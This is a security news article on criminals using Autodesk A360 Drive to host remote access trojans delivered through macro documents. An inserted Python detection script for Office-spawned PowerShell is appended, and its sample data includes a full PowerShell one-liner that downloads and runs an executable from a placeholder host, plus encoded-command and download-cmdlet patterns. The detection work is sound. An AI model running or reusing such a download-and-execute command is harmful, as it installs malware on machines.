SecurityWeek

Cloud Security

Autodesk A360 Drive Used to Spread Malware

Cloud-based online storage service Autodesk A360 Drive has been recently abused as a malware delivery platform, according to Trend Micro.

Functioning much like cloud storage services such as Google Drive, A360 Drive lets a user create a free account and receive 5 gigabytes of storage space. The service is part of the Autodesk A360 cloud-based workspace, which lets design and engineering teams share information across desktop, web, and mobile devices.

On A360 Drive, anyone can upload documents via a browser or desktop, and can also share these files by inviting people to view or edit them. Thus, all that a cybercriminal needs to do to abuse the service is to create an account, upload malicious content, and then embed URLs to this content in the chosen entry vector.

This is exactly what Trend Micro found had happened. Miscreants uploaded a large quantity of malware to A360 Drive and began spreading it via macro-enabled Microsoft Word documents and other file types.

One A360 Drive-hosted archive, the security firm says, contained an executable (.EXE) file with an embedded, obfuscated Visual Basic file that concealed a Zeus/Zbot KINS variant. One Java ARchive (JAR) file discovered on the platform contained an executable file archive that pointed to a variant of the NETWIRE remote access tool.

Another JAR file was found to be a variant of jRAT/Adwind, a piece of malware that can retrieve and exfiltrate a variety of data, including credentials, keystrokes, and multimedia files.

According to Trend Micro, some of the files had been hosted on A360 Drive since June 2017, but the practice only surged in August. These files usually contained remote access tools, either obfuscated EXE files or Java archives, and have not been used in targeted attacks to date.

When it comes to the global distribution of the observed malware, the U.S., South Africa, France, Italy, Germany, Hong Kong, and Austria emerge as the most affected countries.

One of the analyzed files was an Office DOC document called AMMO REQUEST MOD Turkey.doc, which was uploaded to VirusTotal on August 24 and was distributed during the same period. Malicious macros included in the document were pointing to a PowerShell script designed to download a file from A360 Drive and execute it.

The downloaded payload, a Visual Basic obfuscated executable file, was found to be the Trojanized version of the Remcos remote access tool (RAT), which is advertised, sold, and offered cracked on various websites and forums. The malware was being distributed mainly in European countries such as Croatia, Germany, Greece, and Turkey.

Remcos made headlines in February, but it has been used in attacks since 2016. Recently, the RAT has been distributed via a malicious PowerPoint slideshow embedded with an exploit for CVE-2017-0199. In March, the same tool was found on endpoints infected with the MajikPOS point-of-sale (PoS) malware. Apparently, it was used as MajikPOS’s entry point.

“Securing the use of legitimate system administration tools like PowerShell helps mitigate threats and restrict them from being abused. Cloud-based storage platforms are known for being abused, too, and their misuse often allows malicious artifacts into the workplace’s machines. This can be prevented by ensuring that web traffic is scanned within the enterprise,” Trend Micro notes.
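The delivery chain described above (macro-enabled document, PowerShell downloader, payload fetched from a cloud storage service and executed) is also a detection point for the PowerShell hardening Trend Micro recommends. The script below is an added example, not code from the article or from Trend Micro's report: it runs over constructed, Sysmon-style process-creation records and flags PowerShell launched by an Office process with download-and-execute or encoded-command arguments. The field names, the sample events and the `cloud-drive.example` host are assumptions; the article does not name the A360 Drive URL pattern.

```python
import re

# Constructed sample records (not from the article): process-creation events as a
# SIEM might normalise them. The download host is a placeholder.
SAMPLE_EVENTS = [
    {"parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell -w hidden -nop -c \"(New-Object Net.WebClient)"
                ".DownloadFile('https://cloud-drive.example/share/ammo.exe',"
                "'$env:TEMP\\ammo.exe'); Start-Process $env:TEMP\\ammo.exe\""},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -File C:\\scripts\\nightly-backup.ps1"},
    {"parent": "EXCEL.EXE", "image": "cmd.exe", "cmdline": "cmd /c dir"},
    {"parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell -nop -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Download cmdlets and .NET calls commonly seen in macro-launched one-liners.
DOWNLOAD_RE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer", re.I)
# Ways the fetched content gets executed.
EXECUTE_RE = re.compile(r"start-process|invoke-expression|\biex\b|\bsaps\b", re.I)
# -e / -ec / -enc / -EncodedCommand hide the script body from simple command-line logging.
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s", re.I)

def score_event(event):
    """Return the reasons an event resembles the macro -> PowerShell -> download chain."""
    reasons = []
    office_child = (event["parent"].lower() in OFFICE_PARENTS
                    and event["image"].lower() == "powershell.exe")
    if not office_child:
        return reasons  # ordinary PowerShell use by administrators is out of scope here
    reasons.append("powershell spawned by Office process")
    cmd = event["cmdline"]
    if DOWNLOAD_RE.search(cmd):
        reasons.append("download cmdlet or WebClient call")
    if EXECUTE_RE.search(cmd):
        reasons.append("executes fetched content")
    if ENCODED_RE.search(cmd):
        reasons.append("encoded command")
    return reasons

def find_suspicious(events):
    """Map event index -> reasons, for every event that deserves analyst attention."""
    hits = {}
    for idx, ev in enumerate(events):
        reasons = score_event(ev)
        if reasons:
            hits[idx] = reasons
    return hits

if __name__ == "__main__":
    for idx, reasons in find_suspicious(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["cmdline"][:60], reasons)
```

Pairing this host-side rule with the web-traffic scanning the quote mentions covers both ends of the chain: the process that fetches the payload and the storage service it fetches it from.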

The security firm informed Autodesk of its findings and says the two have been working together on taking “down the abused URLs and deploying additional countermeasures to prevent further abuse of A360 Drive.”

Related: PowerPoint Slide Show Files Used to Install Malware

Related: Easy-to-Use Remcos RAT Spotted in Live Attacks

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
